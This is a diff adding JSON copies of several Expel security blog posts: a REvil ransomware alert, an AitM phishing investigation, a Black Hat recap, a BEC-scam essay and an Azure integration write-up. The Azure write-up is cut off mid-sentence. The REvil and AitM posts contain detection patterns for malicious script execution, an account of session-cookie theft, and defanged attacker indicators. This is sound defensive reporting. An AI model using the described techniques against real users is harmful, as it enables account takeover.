a/attack-trend-alert-revil-ransomware.json b/attack-trend-alert-revil-ransomware.json new file mode 100644 index 0000000000000000000000000000000000000000..bb4ccdf807e3e342959bc389c1c803accbcac30c --- /dev/null +++ b/attack-trend-alert-revil-ransomware.json @@ -0,0 +1,6 @@ +{ + "title": "Attack trend alert: REvil ransomware", + "url": "https://expel.com/blog/attack-trend-alert-revil-ransomware/", + "date": "Feb 17, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG Attack trend alert: REvil ransomware Security operations \u00b7 3 MIN READ \u00b7 JON HENCINSKI AND MICHAEL BARCLAY \u00b7 FEB 17, 2021 \u00b7 TAGS: MDR Over the past week, Expel detected ransomware activity targeting law firms attributed to REvil, a Ransomware-as-a-service (RaaS) operation. In this post, we\u2019ll share more about REvil, how we detected this latest attack and what you can do to make your own org more resilient to a REvil attack. What is REvil? REvil is a well-known ransomware group operating a Ransomware-as-a-Service (RaaS) program since early 2019. Given that initial access to a target organization is the job of RaaS affiliates contracted by the core REvil group, the delivery and initial infection vectors vary. But they\u2019ve been known to include phishing, the exploitation of known vulnerabilities in publicly accessible assets and collaboration with botnet owners who sell existing infections to REvil affiliates. In recent REvil campaigns , attackers deployed a modified version of Cobalt Strike\u2019s BEACON agent to compromised systems before escalating privileges and moving laterally in the target environment. Once REvil has administrator-level privileges inside an organization, they\u2019ll deploy REvil ransomware, aka SODINOKIBI or BLUECRAB. What\u2019s new about this particular REvil campaign? This most recent campaign is similar to activity we saw in fall 2020, where users visit a number of compromised yet legitimate third-party websites and are redirected to a Question & Answer (Q&A) forum instructing them to download a ZIP file that contains a malicious JScript file. It appears as though users weren\u2019t directed to these fake forum posts via phishing emails, but instead through their own Google searches. This suggests that the attackers responsible for this campaign invested considerable effort into boosting these malicious pages higher in Google result rankings. Many of these pages align with themes related to legal topics, while others talk about international defense agreements or even cover letter samples. In short, there\u2019s a wide range of topics being showcased on these various sites. The JScript file, when run, deploys a BEACON stager to the system. So far we\u2019ve seen REvil targeting users in Germany and in the United States. How to detect REvil activity in your own environment There are a few activities you can alert on in an effort to detect REvil activity: Alert when you see wscript.exe or cscript.exe execute a .vbs, .vbscript or .js file from a Windows user profile. If this generates too many false positives, try adding the condition where the wscript.exe or cscript.exe process also initiates an external network connection. Alert when wscript.exe or cscript.exe execute a .vbs, .vbscript or .js file from a Windows user profile and the process spawns a cmd.exe process. Alert when you see Windows PowerShell execute a base64 encoded command and the process initiates an external network connection. REvil process example How to remediate if you think you\u2019re affected #1: Contain the host(s) Isolate the host in question to remove attacker access. #2: Start the re-image Attempting to manually clean the fileless persistence mechanism used by this campaign may lead to re-infection on startup if not done properly. That\u2019s why re-imaging is critical. #3: Scope the environment for additional infections The PowerShell command executed as part of this activity occurs at the time of initial installation as well as at startup after persistence is established. This means that it\u2019s extremely important to determine when the initial download of the zipped JScript file occurred and compare that to the timestamp associated with the detected PowerShell activity. Network traffic destined for known command and control domains also provides a good way to timeline activity related to this campaign in your environment. If you discover that this infection persisted in your environment for more than a short period of time, it\u2019s possible that attackers already moved laterally within your environment and/or escalated their privileges within your Active Directory Domain. RaaS actors typically wait until they have the privileges necessary to deploy ransomware to a large portion of your environment at once before moving on from the persistent implant portion of the attack lifecycle and actually deploying ransomware. How to protect yourself against a REvil ransomware attack There are actions you can take in your environment today to better protect your org against a REvil ransomware attack: Configure Windows Script Host (WSH) files to open in Notepad Prevent the double-click of evil JavaScript files. Configure JScript (.js, .jse), Windows Scripting Files (.wsf, .wsh) and HTML for application (.hta) files to open with Notepad. By associating these file extensions with Notepad, you mitigate common remote code execution techniques. Pro tip: PowerShell files (.ps1) already open by default in Notepad. Enable PowerShell Constrained Language mode Constrained Language mode mitigates many PowerShell attacks by removing advanced features that these attack tools rely on such as COM access and .Net and Windows API calls. The language mode of a PowerShell session determines which elements can be used in the session. Don\u2019t expose RDP directly to the internet Don\u2019t expose RDP services directly to the internet. Instead, consider putting RDP servers or hosts behind a VPN that\u2019s backed by two-factor authentication (2FA). Create and test backups of data Consider creating and testing backups of data within your org as part of your IT policy. Regularly creating valid backups that aren\u2019t accessible from your production environment will minimize business disruptions while recovering from ransomware attacks or data loss. Want to find out when we share updates from our SOC on attack trend alerts just like this one? Subscribe to our EXE blog to get our latest posts sent directly to your inbox." +} \ No newline at end of file diff --git a/attacker-in-the-middle-phishing-how-attackers-bypass-mfa.json b/attacker-in-the-middle-phishing-how-attackers-bypass-mfa.json new file mode 100644 index 0000000000000000000000000000000000000000..e80464739e93f41d1716dfe90bb7d825610978f7 --- /dev/null +++ b/attacker-in-the-middle-phishing-how-attackers-bypass-mfa.json @@ -0,0 +1,6 @@ +{ + "title": "Attacker-in-the-middle phishing: how attackers bypass MFA", + "url": "https://expel.com/blog/attacker-in-the-middle-phishing-how-attackers-bypass-mfa/", + "date": "Nov 9, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Attacker-in-the-middle phishing: how attackers bypass MFA Security operations \u00b7 4 MIN READ \u00b7 ANDREW BENTLE \u00b7 NOV 9, 2022 \u00b7 TAGS: MDR TL;DR: Credential phishing is an established attack mode, but multi-factor authentication (MFA) made it much harder on hackers. A new tactic\u2013called \u201cattacker-in-the-middle\u201d\u2013can be effective at end-running MFA defenses. This case examines a recent AitM attack on one of our customers and provides useful advice on how to detect it in your own environment. Credential phishing is nothing new\u2013fooling users into giving away their logins and passwords has been hackers\u2019 bread and butter forever. But until recently the effects of credential phishing could be mitigated by using multi-factor authentication. The attacker might get a password, but the second factor is a lot more difficult. Also not new: attackers finding techniques to bypass security measures. One popular way around MFA is known as attacker-in-the-middle (AitM), where the user is tricked into accepting a bogus MFA prompt. What happened? AitM techniques look identical to regular credential phishing at first. Typically, an email directs the user to a fake login page, which steals credentials when the user attempts to sign in. With normal credential phishing, this fake login page has served its purpose\u2013it stores the credentials and the attacker will attempt to use them at a later time. AitM phishing does something different, though; it automatically proxies credentials to the real login page, and if the account requires MFA users get prompted. When they complete the MFA, the web page completes the login session and steals the session cookie. As long as the cookie is active, the attacker now has a session under the victim\u2019s account. Our SOC recently saw this technique used to bypass MFA and detection in a customer\u2019s environment. The attackers harvested a user\u2019s credentials and login session into their organization\u2019s Microsoft 365 portal using AitM techniques. The attacker evaded detection for 24 days until a suspicious Outlook rule was made in the compromised user\u2019s inbox. Our analysts identified the source IP as a hosting provider and noticed that no login events were seen from the IP address. They followed the related session ID to its earliest date and found that the session originated from another IP address, 137[.]220[.]38[.]57, nearly a month before. This address is related to a hosting provider (Vultr Holdings) and was anomalous for the user account. But something stranger was going on: not only was MFA satisfied from this login, but it was also supported by the Active Directory (AD) agent on the user\u2019s host. This didn\u2019t make sense\u2013how could a login from a random hosting provider IP address use the AD agent tied to the user\u2019s managed host? This is something we might see when a user logs in while using a VPN or proxy, but our analyst\u2019s OSINT research and Expel\u2019s automatic IP enrichment didn\u2019t connect this address with a VPN provider, so we kept digging. We checked logs from their Palo Alto firewall and DNS requests from the host in Darktrace and found DNS requests to rnechcollc[.]com with DNS A records pointing to 137[.]220[.]38[.]57, the same IP the first login was from. The rnechcollc[.]com site hosted an AitM credential harvesting page that proxied the credentials (and even the AD agent authentication from the user\u2019s on-premises host through the Vultr Holdings infrastructure and onto the organization\u2019s Microsoft 365 portal). The page then recorded the session cookie and the attacker continued the active session from a VPN provider for the next 24 days. Confirming AitM in your environment AitM can be tricky to confirm, especially without network logs. But there are a few ways to investigate if a compromise originated from an AITM credential harvesting page. Investigating using only cloud logs: this is the worst-case scenario. All you have are the logs from the cloud providers, be it Okta, Microsoft 365, or any number of other platforms, and the goal will be to determine the initial login IP address by following the session ID back to its earliest point. The initial login will likely, but not necessarily, be from an IP address associated with a hosting provider. Check passive DNS entries associated with the IP address (VirusTotal and PassiveTotal are good tools for this). Check the reputation on the recent DNS entries related to the IP address through OSINT\u2013it may be a known indicator of AitM, as was the case with the rnechcollc[.]com domain. Investigating using network and cloud logs: like the above method, you\u2019ll need to identify the initial login IP address through cloud logs. Follow the session ID back to the initial login and take note of the IP address. Check your firewall logs for URLs associated with the IP address. Confirming connections from within your environment to phishing domains associated with the initial login IP address is a strong indicator of AitM methodology. Investigating using EDR and cloud logs: again, identify the initial login IP address through the cloud logs. Follow the session ID back to the initial login and take note of the IP address for the initial login. Check EDR logs for network connections to the IP address. Some EDRs, like CrowdStrike and Defender for Endpoint, will record domain names related to IP connections. Confirming connections from within your environment to phishing domains associated with the initial login IP address is a strong indicator of AitM methodology. Things you can do to keep your org safe Don\u2019t discount the effectiveness of MFA\u2013 still one of the single most effective security tools that can be implemented in your organization. While AitM can bypass MFA, it represents a small portion of the credential phishing we\u2019ve seen in the wild to date. Consider implementing policies to shorten the time that session tokens can remain active; if attackers lose their sessions, they\u2019ll need to re-phish the user to get it back, or at least get them to accept another MFA prompt. Implement conditional access policies to prevent logins from unwanted countries, noncompliant devices, or untrusted IP spaces. Additionally, services like our Managed Phishing can identify malicious credential harvesting emails and inform your team of campaigns in your organization and help block attacks before they succeed." +} \ No newline at end of file diff --git a/back-in-black-hat-black-hat-usa-2022day-1-recap.json b/back-in-black-hat-black-hat-usa-2022day-1-recap.json new file mode 100644 index 0000000000000000000000000000000000000000..b090fb8ce92dd93242671deaf391b23662001823 --- /dev/null +++ b/back-in-black-hat-black-hat-usa-2022day-1-recap.json @@ -0,0 +1,6 @@ +{ + "title": "Back in Black (Hat): Black Hat USA 2022\u30fcDay 1 Recap", + "url": "https://expel.com/blog/black-hat-usa-2022-day-1-recap/", + "date": "Aug 11, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Back in Black (Hat): Black Hat USA 2022\u30fcDay 1 Recap Expel insider \u00b7 4 MIN READ \u00b7 ANDY RODGER \u00b7 AUG 11, 2022 \u00b7 TAGS: Company news Black Hat is more than a collection of successful events held around the world; it\u2019s a community. And if you needed a reminder of that fact, Black Hat USA 2022 will shake those cobwebs free! While Black Hat did hold its 2021 event at Mandalay Bay in Las Vegas, this year brings more people, more exhibitors, and more energy. From the moment Jeff Moss, founder of Black Hat, took the stage during the first keynote, community has been a common thread throughout the presentations. Moss kicked things off noting that 2022 marks the 25th year of Black Hat USA, and brought the crowd back in time to the conference\u2019s humble origins. At that time, Moss simply reached out to folks in his network to see if they\u2019d want to speak. (Did you know that he considered calling the event \u201cThe Network Security Conference\u201d?) Over the last quarter-century, the community of security practitioners has grown right alongside the expanding threat landscape. Until recently, Moss had thought there were three \u201cteams\u201d when it came to cybersecurity: Team Rule of Law, Team Undecided, and Team Authoritarian. Some teams were following the rules, others were limiting access to information, and there were even a few more somewhere in the middle. But now he sees a new team: a community of super-empowered individuals and organizations. These were people much like the attendees of Black Hat, who take action to right the wrongs in the world. For example, Moss noted how some companies simply stopped doing business with Russian companies in the wake of the Ukraine invasion. Some turned off access by Russian companies to their services and others shut down their websites. He used this example to remind attendees that this community has a significant influence in the world. Following Moss was Chris Krebs of the Krebs Stamos Group, and former director of the Department of Homeland Security\u2019s Cybersecurity and Infrastructure Security Agency (CISA). Krebs spoke about his time \u201cwandering the wilderness\u201d over the past few years, and talking to people in and outside the U.S. across a range of roles about their security challenges and concerns. He kept hearing three questions: Why is it so bad right now? What do you mean it\u2019s going to get worse? What can we do about it? These aren\u2019t easy questions to answer, but he sees the solution in this community of people who have the ability to make positive changes based on its principles. Krebs covered a lot of ground during his roughly 45 minutes on stage, but if there was a single takeaway, it\u2019s that he holds a lot of hope for cybersecurity and its role in improving the world. Black Hat explores those huge macro issues, but it also looks at smaller ones, too\u2014the ones that practitioners face day-in and day-out to better protect their organizations. Kyle Tobener led a session on taking a \u201charm reduction\u201d approach to cybersecurity best practices. Did you know that most organizations\u2019 security teams employ a \u201cuse reduction\u201d approach to security best practices? To quote the Five Man Electrical Band song \u201cSigns\u201d: Do this, don\u2019t do that, can\u2019t you read the signs? Tobener argued that simply telling people what to do isn\u2019t effective. In fact, he shared research that showed how this approach can have the opposite effect. He instead advocates for harm reduction, a commonly used approach in healthcare. Harm reduction offers a set of practical strategies and ideas aimed at reducing the negative consequences associated with various human behaviors. It focuses on the outcomes, not the original behaviors. His advice? Remove \u201cdon\u2019t do that\u201d from your vocabulary. Replace it with, \u201cTry not to do that, but if you do, then here are some ways to be safe.\u201d Adam Shostack of Shostack and Associates took the stage virtually in his session titled, \u201cA Fully Trained Jedi You Are Not.\u201d Shostack pointed out that while the Star Wars movies usually focused on the Jedi and their contribution to the rebellion, non-Jedi characters made huge contributions. He emphasized that the field of cybersecurity needs people of all different skill sets and experience levels, and the field isn\u2019t limited to Jedi-level cybersecurity masters. Instead he shared that a mix of more targeted training and education combined with an effort to \u201cshift left\u201d (incorporating security into the development process) can solve a lot of cybersecurity issues and better support developers and security personnel alike. After all, it takes more than Jedi knights for a successful rebellion. Burnout can have a major impact on cybersecurity professionals. Stacy Thayer, Ph.D., knows this all too well, and shared her knowledge on the topic in her session, \u201cTrying to be Everything to Everyone: Let\u2019s Talk About Burnout.\u201d A number of factors contribute to burnout in cybersecurity. Dr. Thayer named a few: High levels of mental workload Anticipating cyber-attacks A shortage in staffing and an increase in workload A struggle to find one\u2019s place within the organization Work is often not appreciated in the organization Dr. Thayer says that the usual advice for dealing with burnout is completely ineffective. Take a vacation? Sure! I\u2019ll just have more work waiting for me when I get back. Go to the gym? Okay, I feel like absolute garbage but sure let\u2019s get on the treadmill! Stop caring so much? Not possible! According to Dr. Thayer, the more that you learn about yourself and your relationship with burnout and your hidden triggers, the better you\u2019ll be at managing it. These are just a few of the topics that presenters covered on day one of the event. Presenters and attendees shared so much more in sessions and on the business hall floor, but if there\u2019s anything that\u2019s obvious about Black Hat USA 2022, it\u2019s that the community here is alive and well, and poised for great things." +} \ No newline at end of file diff --git a/bec-and-a-visionary-scam.json b/bec-and-a-visionary-scam.json new file mode 100644 index 0000000000000000000000000000000000000000..09eb4b48075cf40f01427670001f96c23dfb1670 --- /dev/null +++ b/bec-and-a-visionary-scam.json @@ -0,0 +1,6 @@ +{ + "title": "BEC and a \u201cVisionary\u201d scam", + "url": "https://expel.com/blog/bec-and-a-visionary-scam/", + "date": "Jan 10, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG BEC and a \u201cVisionary\u201d scam Tips \u00b7 2 MIN READ \u00b7 SHARON BURTON \u00b7 JAN 10, 2023 \u00b7 TAGS: MDR What does business email compromise (BEC) have to do with the vanity anthology scam? \u201cTo be part of this exciting project, all you have to do is pay $700 by Jan 1!\u201d I\u2019m a writer. I\u2019m also a woman in tech. When I saw the call for writers in a Reddit channel, looking for women in tech to write an essay about their career for an upcoming book, I was interested. Very interested. I filled out the Google form. On December 22, I got a group email announcing a project meeting at 6pm that day. A little short notice and the message didn\u2019t indicate the time zone, but OK. Responding back to the group, I clarified the time zone and decided I could attend. We met on Google Teams. The woman running the meeting seemed uncertain how to work a virtual meeting, which seemed strange because she billed herself as the chief information officer (CIO) of a large organization and, well, it\u2019s 2022. \u201cWe\u2019re always learning!\u201d she announced to the 20 or so women as she struggled to get the video and screen share to work. She devoted the first 15 minutes of the presentation to her professional background, which demonstrated that she was a \u201cVisionary.\u201d She even referred to herself that way on the typo-ridden slides. Visionary, upper case. She covered the many benefits of the book project for this select group. Visibility in our profession, authority, marketing, inspiration, you can\u2019t be what you can\u2019t see. Our stories would inspire generations. Generations. By the time she got to the part where we needed to give her $700 nonrefundable dollars by Jan 1st to be included in this inspiring project\u30fcor $100 now and three easy payments!\u30fcI knew we were in the middle of a scam. Specifically, the vanity anthology scam . Most professional writer organization websites cover it in detail. Different con, same rules So why should this story interest cybersecurity people? I\u2019m fortunate to work for a security company. When this scam presented itself, I\u2019d just completed our annual internal security training, and was hyper-vigilant about everything, so I saw this swindle for what it was. Because we\u2019re assaulted by an array of ad, marketing, economic, and partisan pitches every day, we\u2019ve evolved pretty good BS detectors. But scammers are evolving too. In this case, the Visionary employed tactics very similar to what we commonly see in BEC scams. Sense of urgency: the first meeting happened just as most people were starting their holiday break, with all the bustle that goes with it. We were given about six hours notice of the meeting. Payment was due in a week. This was all very fast during a time of year where people are already overloaded with commitments and tasks. Typos and other language issues: writers are especially sensitive to typos and dropped words because, well, words are our air. The slides had typos and missing words. Not what I expect of a CIO. Uncertainty in using basic tech: the Visionary didn\u2019t know how to share her screen initially. In 2022. After two years of remote pandemic work. Additionally, she was a CIO. A basic familiarity with simple conferencing and presentation is expected. And this was for women in tech, so technological ability should be inherent. Person of authority: She used her r\u00e9sum\u00e9 to assert credibility and emphasized how important the Visionary is in the world of tech. Too good to be true: being included in this project would enhance our careers and inspire generations. She said the volume would be an Amazon Best Seller. That\u2019s a lot for any book, much less one that\u2019s essentially self-published. In the end, the message is that people are people and bad guys are bad guys. The lessons we learn from \u201creal life\u201d apply to the cyber world, and vice versa. My awareness of BEC tactics helped me sniff out the Visionary\u2019s grift. Take your sensitivity to the iffy product and service claims you encounter in everyday life with you when you log in. And maybe that\u2019s how we inspire generations." +} \ No newline at end of file diff --git a/behind-the-scenes-building-azure-integrations-for-asc-alerts.json b/behind-the-scenes-building-azure-integrations-for-asc-alerts.json new file mode 100644 index 0000000000000000000000000000000000000000..a777cb108f09e83777cdc9e434d3c624e8d2a041 --- /dev/null +++ b/behind-the-scenes-building-azure-integrations-for-asc-alerts.json @@ -0,0 +1,6 @@ +{ + "title": "Behind the scenes: Building Azure integrations for ASC alerts", + "url": "https://expel.com/blog/building-azure-integrations-asc-alerts/", + "date": "Feb 9, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG Behind the scenes: Building Azure integrations for ASC alerts Engineering \u00b7 12 MIN READ \u00b7 MATTHEW KRACHT \u00b7 FEB 9, 2021 \u00b7 TAGS: Cloud security / MDR / Tech tools If you\u2019ve read the Azure Guidebook: Building a detection and response strategy , you learned that we\u2019ve built our own detections and response procedures here at Expel. Missed the guidebook? Download it here But what we didn\u2019t share in that guidebook is how we figured a lot of those things out. Anytime you learned some lessons the hard way, it makes for a long story; which is exactly what I\u2019m sharing with you here. This story begins with our need to replace a third-party tool we were using to pull logs from various cloud providers. Building it ourselves gave Expel new access to data, improved monitoring and ended up allowing us to update our entire detection strategy for Azure Security Center (ASC) alerts and Azure in general. Over the years that third-party application started to creak and groan under the pressure of our needs. Something needed to change. Let\u2019s connect That\u2019s where I came in. (Hi! I\u2019m Matt and I\u2019m a senior software engineer on Expel\u2019s Device Integrations [DI] team.) Building an integration isn\u2019t a simple or linear process. It\u2019s why we warned Azure guidebook readers to go into the process with eyes wide open. It\u2019s also why we harp on the importance of team communication. I\u2019ll walk you through how we built an integration on top of Azure signal to help our analysts do their jobs effectively and share some lessons learned along the way. Finding the right signal At Expel, building an integration is a collaborative effort. The DI team works with the Detection and Response (D&R) team and the SOC to identify sources of signal and additional data to include in our alerts. Early on in the process the DI and D&R teams evaluate the technology and to decide which security signals and raw events are accessible. For Azure, all security signals revolve around ASC. Once we decided on using ASC as our primary alert source, I got to work building out the data pipeline. D&R got to work generating sample alerts within our test environment. Before long we had a POC working that was generating ASC alerts within the Expel Workbench\u2122. If you don\u2019t already know, ASC provides unified security management across all Azure resources as well as a single pane of glass for reviewing security posture and real-time alerts. It\u2019s one of the primary sources of alerts across Microsoft\u2019s security solutions. But I still had to figure out the best way to access the data. The good part for Expel was that there are a lot of ways to access ASC alerts; the challenging part is that, well, there are a lot of ways to access ASC alerts. In the end, we went through three different approaches for accessing these alerts \u2013 each with their pros and cons: Microsoft Graph Security API Azure Log Analytics API Azure Management API When we began development of our Azure integration, the Security API was a relatively new offering within Microsoft Graph. It\u2019s intended to operate as an intermediary service between all Microsoft Security Providers and provides a common schema. Microsoft Graph Security API presents two advantages for Expel: The single point of contact for all Microsoft Security alerts allows us to easily adapt and expand our monitoring services as our customers\u2019 needs and tech stack change without requiring our customers to enable us with new permissions or API keys. The common alert schema of the Security API means we only have to adapt one schema to Expel\u2019s alert schema rather than one schema per Microsoft product offering. We already used Microsoft Graph Security API for our Azure Sentinel integration so we were poised to take advantage of the extensibility of the API by simply adding ASC to the types of alerts we were retrieving, or so we thought. Our SOC analysts walked us through comparisons between ASC alerts in the Expel Workbench\u2122 and those same alerts within the ASC console. It quickly became apparent that the data we retrieved from Graph Security API were missing key fields. We had previously used Azure Log Analytics (ALA) to enrich alerts for our Azure Sentinel integration and thought we might be able to do the same for ASC. I worked with the analysts to find different sources of data so we could fill in those data gaps from the Graph Security API. With this approach, we could find almost all of the alert details not provided by the Graph Security API. The downside and eventual death knell to this approach was that ASC alerts by default are not forwarded to ALA. Forwarding ASC alerts would require extra configuration steps for our customers as well as the potential for increased ALA costs. The following chart gives a comparison of what ASC fields were found via each API for a single ASC alert for anomalous data exfiltration. Note that each ASC alert type will have different fields but this chart follows closely with our general experience of data availability across these APIs. A table showing, for anomalous activity related to storage blobs, what fields in the alert are or aren\u2019t present based on how you access the alert As the saying goes: when one Azure door closes another always opens. We couldn\u2019t get the fields we needed from the Graph Security API and we couldn\u2019t reliably find those fields within Azure Log Analytics, but we still had Azure Management API to welcome us with open arms. The ASC console uses Azure Management API so we knew we could get data parity using that API. The reason we avoided it initially was that the normalization would require a lot more effort. Each alert type had its own custom fields (see properties.ExtendedProperties field ) and there wasn\u2019t a set schema for these fields. Fortunately, we had enough examples of these alerts and could use those examples to drive our normalization of Azure alerts. In the end, data parity and SOC efficiency are a higher priority for us than some upfront normalization pain, so we went down the Azure Management API route (pun intended). Scaling our SOC If you\u2019ve ever worked with ASC, you probably also know that managing the alerts can feel a little overwhelming. Most of the alerts are based around detecting anomalous behavior or events (like unusual logins or unusual amounts of data extracted). Note that these alerts are generated from different Azure subsystems or resources, so as your environment changes, so do the types of alerts you\u2019ll see. Microsoft is also constantly improving and updating these alerts so you might also find yourself handling \u201cpreview\u201d alerts. And how do I know all this? I didn\u2019t until we started to scale up our POC integration. As soon as our analysts started seeing ASC alerts coming in Expel Workbench\u2122, we immediately got feedback around the lack of context available in the alert. Who is the \u201csomeone\u201d that extracted data from the storage account? What are their usual interactions with that storage account? What other user activity was there outside of Azure Storage? These are all questions that our analysts would need to answer in order to act. The example below shows what little context we had around the ASC alert. Preview alert with missing storage operation data (ex. Extracted Blob Size) Without context, our analysts will pivot to the source technology to look for additional fields to help them make a decision. In this case, they log in to the Azure portal to get more info about the alert. This experience isn\u2019t ideal for our analysts. As a side note, pivots to console (when an analyst leaves Expel Workbench\u2122 to get more details on an alert) is a monthly metric we present to the whole executive team. We track how many times a day, week and month analysts are pivoting (per each vendor technology we support) because it\u2019s an easy indicator that there\u2019s room for improvement. My team works hard to provide our analysts with the information they need to quickly make good decisions and take action, rather than spending their time doing mundane tasks like logging into another portal. Any DI team member will tell you that their worst fear is writing an integration that creates extra work for (read as: annoys) the SOC. But most importantly, an efficient SOC helps us support more customers \u2013 and provide better service. For Azure in particular this meant adjusting the noise inherent in having large amounts of alert types and also adding more context around the anomaly-based alerts. Reducing the noise We continuously work to improve the signal of alerts with all of our integrations. ASC, however, was difficult because of the outsized impact configurations have on the variety of alerts you get. For instance, ASC alerts are not generated unless a paid service called Azure Defender is enabled. Azure Defender can be enabled per Azure subscription, per resource type such as Azure Defender for Servers and, in some cases, per individual resources. The configuration of Azure Defender along with the different underlying resources being monitored created a lot of variance in the alerts. As we transitioned from our test Azure environment to real cloud environments, we quickly found this out. Our D&R team generated plenty of ASC alerts but in a live environment we received \u201cpreview\u201d (i.e. beta) alerts, duplicate alerts from Azure AD Identity Protection or Microsoft Cloud App Security along with alerts from Azure resources that we couldn\u2019t set up in our environment. I was able to deduplicate the ASC alerts from other Azure Security Providers (one of the pros of the Security Graph API is that it will do this for you). The D&R team was able to update detections so that we can ignore known low-fidelity alert types and preview alerts. But, even with all of these improvements, we can still get new alert types. As with any tuning effort, the work is ongoing. But we at least solved the known issues. Adding moar context By far the biggest challenge with our ASC integration was getting enough context around an alert so that our analyst could quickly understand the cause of the alert and make triage decisions. After iterating over all three REST APIs to address the data gaps, we eventually got to data parity between Expel Workbench\u2122 and ASC\u2019s console. However, our analysts still didn\u2019t have the context they needed to understand ASC alerts based around anomaly detection. Enter the D&R team. They took the lead on deciphering not only the breadth of alerts ASC generated but also, with the help of our SOC analysts, determined what types of log data were needed to understand each of these alerts. For instance, when we got an ASC alert warning of \u201can unusual amount of data was extracted from a storage account,\u201d D&R built automation in the Expel Workbench\u2122 that uses platform log data to show analysts exactly what the user\u2019s \u201cusual\u201d actions were. Helpful; right? You can see an example below. Example of automated decision support for an ASC alert in Expel Workbench\u2122 That not only bridged the context gap of the ASC alerts but also helped provide a framework around how our analysts triage ASC alerts. And as a bonus it didn\u2019t require them to perform any additional manual steps or pivot into the Azure portal. Is this thing on? Finding the right alert signal and making sure our SOC can triage that signal efficiently are the bread and butter of any integration. However, getting those right doesn\u2019t necessarily mean we\u2019ve created a great integration. Alongside these priorities, we\u2019re focused on operations aspects of the integration: creating a good onboarding experience, ensuring we have optimal visibility (health monitoring) and reducing storage costs. Improving visibility When building the Azure integration, we added plenty of metrics to help us profile each environment. Some technologies we integrate with have a fairly narrow range of configuration options but when it comes to monitoring an entire cloud environment that range becomes very large, very fast. As we onboarded customers, we were not only looking at performance metrics but also monitoring subscription totals, resource totals and configurations of each resource. Example customer Azure Subscription totals with Azure Defender configuration settings The image above shows a sampling of a few of our Azure customers, the number of subscriptions we\u2019re actively monitoring and the various Azure Defender configuration settings we detected. You can see there\u2019s a broad number of total subscriptions, and Azure Defender is in various status across the customer and subscriptions. We knew these metrics would help us provide insight to customers on how to maximize our visibility; we just didn\u2019t realize how quickly that was going to occur. Right away we started catching misconfigurations \u2013 disabled logs, Azure Defender not being enabled for any resources, missing subscriptions, etc. We could do as much alert tuning or detection writing as we wanted but without the proper visibility it wouldn\u2019t be much use. Example Expel Workbench\u2122 warning of a potential device misconfiguration You might be noticing a theme: the importance of feedback. And our feedback loop doesn\u2019t just include our internal teams. Ensuring our customers are on the same page and can share their thoughts is critical to making sure we\u2019re doing our job well. So, as we onboarded customers to the integration, our Customer Success team jumped in to work with customers to find ways to improve their configuration. They then ensured each of these customers understood the way our Azure monitoring works and the value of these configuration changes. As the Customer Success team worked, the Turn on and Monitoring team (this is Expel\u2019s internal name for our feature team focused on making onboarding simple, intuitive and scalable along with proactively detecting problems with the fleet of onboarded devices Expel integrates with) used this feedback to build out a way for us to provide automatic notifications for common configuration issues. Example Ruxie notification for a misconfigured Azure Expel Workbench\u2122 device Did you forget to provide access for us to monitor that subscription? No problem. We automatically detect that and provide you a notification along with steps to fix the issue within minutes of creating the Azure device in Workbench\u2122. Keeping costs in check There are design decisions which have very real implications toward cost as you build out integrations with an IaaS provider. Azure was no different. Requiring customers to enable Azure Defender increases their Azure bill. Requiring customers to forward resource logs to Azure Log Analytics increases their Azure bill. If we only integrate with Azure Sentinel, that increases our customer\u2019s Azure bill. And so on\u2026 When it comes to these decisions, we lean towards reducing direct cost to customers. We\u2019ve already discussed how important log data is for providing context around ASC alerts. Azure Storage log data is particularly important. This log data is basically a bunch of csv files within Azure Storage itself . If you want to search this data, you have to forward it to a log management solution within the Azure ecosystem \u2013 that means Log Analytics. During the development of the integration, the best resource from Microsoft for forwarding logs was to use a PowerShell Script to pull storage log data, translate it into JSON format and upload it to a Log Analytics workspace where the data can then be searched or visualized. As of this writing, there is a preview Diagnostic Settings feature for Azure Storage accounts that allows automatic forwarding of logs to ALA via the Azure console. Even though forwarding the logs to ALA is becoming easier, storing these logs in ALA can be expensive. In some cases, our customers would have paid more than $300 a day, or over $100k a year, to store their Azure Storage logs within ALA. Instead of requiring customers to foot the bill for the storage and also adding yet another configuration step, we decided to directly ingest those logs into our own backend log management solution. This helped us solve the cost problem across all our customers with a single solution. A typical approach to solving this problem is to figure out which logs you don\u2019t need and then filter them out prior to ingestion. In the case of Azure Storage, each log entry is a storage operation so it drops benign operations during ingestion. This approach is difficult for two reasons. The first is that we\u2019re dealing with a large variety of Azure environments. Determining a set of benign operations may be possible for a single environment but the odds aren\u2019t good for determining benign operations across all customer environments. The second is that these logs helped provide context around detections of anomalous behavior. Removing whole swaths of logs would make understanding what was normal versus abnormal more difficult. To get around this, I worked with D&R to create a log aggregation approach that would decrease the log volume without filtering whole chunks of logs or reducing our context. The idea was that we could determine what log entries pertained to the \u201csame\u201d operation but at different points in time. If the operations were the \u201csame\u201d then we would combine them into a single log record with added operation counts and time windows. Based on the operation type we could loosen or tighten our definition of \u201csame\u201d in order to provide better aggregation performance. In the end, we were able to achieve a 93 percent reduction in volume across all of the storage accounts we were monitoring while still maintaining the contextual value of the logs themselves. This was no small feat considering the diversity of Azure Storage use cases, and thus log content, across our different Azure customers. Estimated costs for searchable Azure Storage logs Volume (MB/day) Est. ALA Cost ($/yr) Device Azure Storage Accounts Raw Aggregate Raw Aggregate Reduction (%) cb7ebb31-c17f-4b73-9962-db585b94f58d 68 173268 2917 138547 2332 98.32 6321c95f-b6c9-4e65-9a18-8760a0846387 24 54551 10047 43619 8033 81.58 0c839cc8-90ae-4733-b9f5-992f5461ed2c 168 19287 626 15422 500 96.76 afe394af-609e-425f-a075-197047aa1875 5 15718 5027 12569 4019 68.02 f3b0a370-d1d0-4160-a3fc-06d5ed400797 7 1569 9 1254 7 99.45 8e7a3c33-09be-468b-beeb-b51bcc524c06 58 49 13 39 10 73.58 503f94e4-7322-42c2-8794-8cbc51494a2e 21 40 17 32 14 56.90 3d77e130-23f9-4db7-a0aa-8212b2f513bd 2 17 2 14 2 88.47 1bc7556a-1a54-45f6-979a-77ab57b2af0f 1 16 2 13 1 88.68 Above is the table we built internally to track various customer storage costs as we worked to reduce their cost and still capture relevant logs to enable detection and response. Teamwork: Always Azure bet Our goal is to always provide high-quality alerts with as much context and information to both our analysts and customers. The collective expertise of our teams and their ability to react and solve problems in real-time helped us not only replace the third-party application, but also create an entirely new 